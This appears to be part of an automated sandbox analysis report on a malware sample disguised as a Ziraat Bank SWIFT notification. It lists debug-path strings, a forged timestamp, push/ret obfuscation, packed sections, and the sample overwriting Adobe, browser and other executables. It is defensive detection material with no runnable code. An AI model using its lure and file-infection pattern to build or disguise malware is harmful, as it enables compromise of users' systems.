Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000013.00000002.1440773629.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1671146289.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.1649365761.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbL" source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, build.exe, 0000000A.00000002.2603046672.0000000006620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp

Binary contains a suspicious time stamp

Source: alg.exe.0.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

PE file contains an invalid checksum

Source: AppVClient.exe.0.dr

Static PE information: real checksum: 0xcd10f should be: 0x153130

PE file contains sections with non-standard names

Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat
Source: officesvcmgr.exe.2.dr	Static PE information: section name: .didat
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: .gxfg
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: .retplne
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: CPADinfo
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: malloc_h
Source: chrmstp.exe.2.dr	Static PE information: section name: .gxfg
Source: chrmstp.exe.2.dr	Static PE information: section name: .retplne
Source: chrmstp.exe.2.dr	Static PE information: section name: .rodata
Source: chrmstp.exe.2.dr	Static PE information: section name: CPADinfo
Source: chrmstp.exe.2.dr	Static PE information: section name: LZMADEC
Source: chrmstp.exe.2.dr	Static PE information: section name: _RDATA
Source: chrmstp.exe.2.dr	Static PE information: section name: malloc_h
Source: setup.exe.2.dr	Static PE information: section name: .gxfg
Source: setup.exe.2.dr	Static PE information: section name: .retplne
Source: setup.exe.2.dr	Static PE information: section name: .rodata
Source: setup.exe.2.dr	Static PE information: section name: CPADinfo
Source: setup.exe.2.dr	Static PE information: section name: LZMADEC
Source: setup.exe.2.dr	Static PE information: section name: _RDATA
Source: setup.exe.2.dr	Static PE information: section name: malloc_h
Source: notification_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: notification_helper.exe.2.dr	Static PE information: section name: .retplne
Source: notification_helper.exe.2.dr	Static PE information: section name: CPADinfo
Source: notification_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: os_update_handler.exe.2.dr	Static PE information: section name: .gxfg
Source: os_update_handler.exe.2.dr	Static PE information: section name: .retplne
Source: os_update_handler.exe.2.dr	Static PE information: section name: CPADinfo
Source: os_update_handler.exe.2.dr	Static PE information: section name: LZMADEC
Source: os_update_handler.exe.2.dr	Static PE information: section name: _RDATA
Source: chrome_proxy.exe.2.dr	Static PE information: section name: .gxfg
Source: chrome_proxy.exe.2.dr	Static PE information: section name: .retplne
Source: chrome_proxy.exe.2.dr	Static PE information: section name: _RDATA
Source: crashreporter.exe.2.dr	Static PE information: section name: .00cfg
Source: crashreporter.exe.2.dr	Static PE information: section name: .voltbl
Source: default-browser-agent.exe.2.dr	Static PE information: section name: .00cfg
Source: default-browser-agent.exe.2.dr	Static PE information: section name: .voltbl
Source: firefox.exe.2.dr	Static PE information: section name: .00cfg
Source: firefox.exe.2.dr	Static PE information: section name: .freestd
Source: firefox.exe.2.dr	Static PE information: section name: .retplne
Source: firefox.exe.2.dr	Static PE information: section name: .voltbl
Source: updater.exe.2.dr	Static PE information: section name: CPADinfo
Source: updater.exe.2.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe.2.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.2.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.2.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.2.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.2.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.2.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.2.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.2.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe0.2.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe0.2.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe0.2.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.2.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.2.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.2.dr	Static PE information: section name: _RDATA
Source: Acrobat.exe.2.dr	Static PE information: section name: .didat
Source: Acrobat.exe.2.dr	Static PE information: section name: _RDATA
Source: unpack200.exe.2.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.2.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.2.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr	Static PE information: section name: malloc_h
Source: setup.exe0.2.dr	Static PE information: section name: .00cfg
Source: setup.exe0.2.dr	Static PE information: section name: .gxfg
Source: setup.exe0.2.dr	Static PE information: section name: .retplne
Source: setup.exe0.2.dr	Static PE information: section name: LZMADEC
Source: setup.exe0.2.dr	Static PE information: section name: _RDATA
Source: setup.exe0.2.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.2.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.2.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.2.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe.2.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: malloc_h
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .00cfg
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .retplne
Source: notification_click_helper.exe.2.dr	Static PE information: section name: CPADinfo
Source: notification_click_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: notification_click_helper.exe.2.dr	Static PE information: section name: malloc_h
Source: pwahelper.exe.2.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe.2.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe.2.dr	Static PE information: section name: .retplne
Source: pwahelper.exe.2.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe.2.dr	Static PE information: section name: malloc_h
Source: AcroCEF.exe.2.dr	Static PE information: section name: .didat
Source: AcroCEF.exe.2.dr	Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: _RDATA
Source: AcroCEF.exe0.2.dr	Static PE information: section name: .didat
Source: AcroCEF.exe0.2.dr	Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00428945 push ecx; ret	0_2_00428958
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00402F12 push es; retf	0_2_00402F13
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB0CAh; ret	0_2_00ADB061
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB30Dh; ret	0_2_00ADB1E6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB2F2h; ret	0_2_00ADB262
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB255h; ret	0_2_00ADB2ED
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB2D0h; ret	0_2_00ADB346
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB37Fh; ret	0_2_00ADB3B7
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD520C push 00AD528Fh; ret	0_2_00AD522D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF852Eh; ret	0_2_00AF7F3A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8514h; ret	0_2_00AF7F66
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF7E66h; ret	0_2_00AF8057
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF817Ah; ret	0_2_00AF808B
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF82E5h; ret	0_2_00AF80D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF826Ah; ret	0_2_00AF819E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF849Ch; ret	0_2_00AF81E4
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF805Ch; ret	0_2_00AF8255
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8321h; ret	0_2_00AF82E0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF7FBFh; ret	0_2_00AF831F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF7FA8h; ret	0_2_00AF834C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF84BAh; ret	0_2_00AF83E2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8426h; ret	0_2_00AF84D8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8075h; ret	0_2_00AF84FD
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF808Ch; ret	0_2_00AF8512
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8B6Fh; ret	0_2_00AF8596
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8E94h; ret	0_2_00AF85C9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF878Bh; ret	0_2_00AF8734
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8D45h; ret	0_2_00AF87D3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8E5Fh; ret	0_2_00AF885F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8AB5h; ret	0_2_00AF8B13
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8784h; ret	0_2_00AF8CA1

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Static PE information: section name: .reloc entropy: 7.931602490930911
Source: niellist.exe.0.dr	Static PE information: section name: .reloc entropy: 7.931602490930911
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.936484752465955
Source: officesvcmgr.exe.2.dr	Static PE information: section name: .reloc entropy: 7.937208276445302
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: .reloc entropy: 7.941673740769108
Source: AutoIt3_x64.exe.2.dr	Static PE information: section name: .reloc entropy: 7.943916878766287
Source: SciTE.exe.2.dr	Static PE information: section name: .reloc entropy: 7.912294411088926
Source: jucheck.exe.2.dr	Static PE information: section name: .reloc entropy: 7.931052218150096
Source: jusched.exe.2.dr	Static PE information: section name: .reloc entropy: 7.936037837889428
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: .reloc entropy: 7.937492437508995
Source: chrmstp.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9359021068054485
Source: setup.exe.2.dr	Static PE information: section name: .reloc entropy: 7.935901892594789
Source: notification_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9446303310280735
Source: os_update_handler.exe.2.dr	Static PE information: section name: .reloc entropy: 7.943489828015681
Source: chrome_proxy.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940804420536394
Source: default-browser-agent.exe.2.dr	Static PE information: section name: .reloc entropy: 7.941517758258086
Source: firefox.exe.2.dr	Static PE information: section name: .reloc entropy: 7.93886858959448
Source: updater.exe.2.dr	Static PE information: section name: .reloc entropy: 7.878644949506129
Source: elevation_service.exe.2.dr	Static PE information: section name: .reloc entropy: 7.945941404050487
Source: elevation_service.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.945122234201387
Source: 7zFM.exe.2.dr	Static PE information: section name: .reloc entropy: 7.932133822129433
Source: 7zG.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9276747476160345
Source: Acrobat.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940529493632316
Source: identity_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940722839651193
Source: setup.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.944734605502099
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .reloc entropy: 7.936561935775991
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .reloc entropy: 7.94225456216923
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9462488646796805
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.944000050287652
Source: pwahelper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940884454479864
Source: AcroCEF.exe.2.dr	Static PE information: section name: .reloc entropy: 7.937547865419181
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: .reloc entropy: 7.943696985461369
Source: AcroCEF.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.937547623122581
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.943698423708796

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin

Jump to behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
